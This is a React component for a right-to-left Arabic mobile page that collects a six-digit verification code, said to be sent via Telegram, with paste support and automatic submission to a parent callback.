// pages/auth_verification.mobile.js
import React, { useState, useRef , useEffect} from 'react';
import './auth_verification.mobile.css';

export default function AuthVerificationMobile({ error, loading, success, onVerify }) {
  const [code, setCode] = useState(['', '', '', '', '', '']);
  const inputRefs = useRef([]);

  const isSubmitting = loading || success;

  useEffect(() => {
    if (inputRefs.current[0]) {
      inputRefs.current[0].focus();
    }
  }, []);

  const handleChange = (index, value) => {
    if (isSubmitting) return;

    if (value && !/^\d+$/.test(value)) return;
    const newCode = [...code];
    newCode[index] = value.slice(-1);
    setCode(newCode);

    if (value && index < 5) {
      inputRefs.current[index + 1].focus();
    }
    
    if (newCode.join('').length === 6) {
      onVerify(newCode.join(''));
    }
  };

  const handleKeyDown = (index, e) => {
    if (isSubmitting) return;
    if (e.key === 'Backspace' && !code[index] && index > 0) {
      inputRefs.current[index - 1].focus();
    }
  };

  const handlePaste = (e) => {
    e.preventDefault();
    if (isSubmitting) return;
    const pastedData = e.clipboardData.getData('text').replace(/\D/g, '').slice(0, 6);
    
    if (pastedData) {
      const newCode = [...code];
      for (let i = 0; i < pastedData.length; i++) {
        if (i < 6) newCode[i] = pastedData[i];
      }
      setCode(newCode);
      
      // نقل التركيز للخانة الصحيحة بعد اللصق
      const nextIndex = Math.min(pastedData.length, 5);
      inputRefs.current[nextIndex].focus();

      // إرسال تلقائي إذا تم لصق 6 أرقام
      if (newCode.join('').length === 6) {
        onVerify(newCode.join(''));
      }
    }
  };
  return (
    <div className="mobile-verify-container" dir="rtl">
      <div className="mobile-verify-content">
        <p className="mobile-verify-text">
          قد قمنا بإرسال رمز التحقق إلى تليجرام . يُرجى التحقق من صندوق الوارد وإدخال الرمز لإتمام العملية
        </p>
        {/* 🔹 منطقة عرض حالة الصفحة 🔹 */}
        <div className="mobile-verify-status">
          {loading && <span className="status-msg status-loading"><i className="fa-solid fa-circle-notch fa-spin"></i> جارِ التأكد من الرمز...</span>}
          {error && <span className="status-msg status-error"><i className="fa-solid fa-triangle-exclamation"></i> {error}</span>}
          {success && <span className="status-msg status-success"><i className="fa-solid fa-circle-check"></i> تم التأكد بنجاح! جاري التحويل...</span>}
        </div>
        {/* حقول الرمز الستة */}
        <div className="mobile-verify-inputs">
          {code.map((digit, index) => (
            <input
              key={index}
              ref={(el) => (inputRefs.current[index] = el)}
              type="text"
              inputMode="numeric"
              maxLength={1}
              value={digit}
              onChange={(e) => handleChange(index, e.target.value)}
              onKeyDown={(e) => handleKeyDown(index, e)}
              dir="ltr"
            />
          ))}
        </div>
      </div>
      
      {/* شريط الـ DNA التجميلي أسفل الشاشة */}
      <div className="mobile-dna-bg"></div>
    </div>
  );
}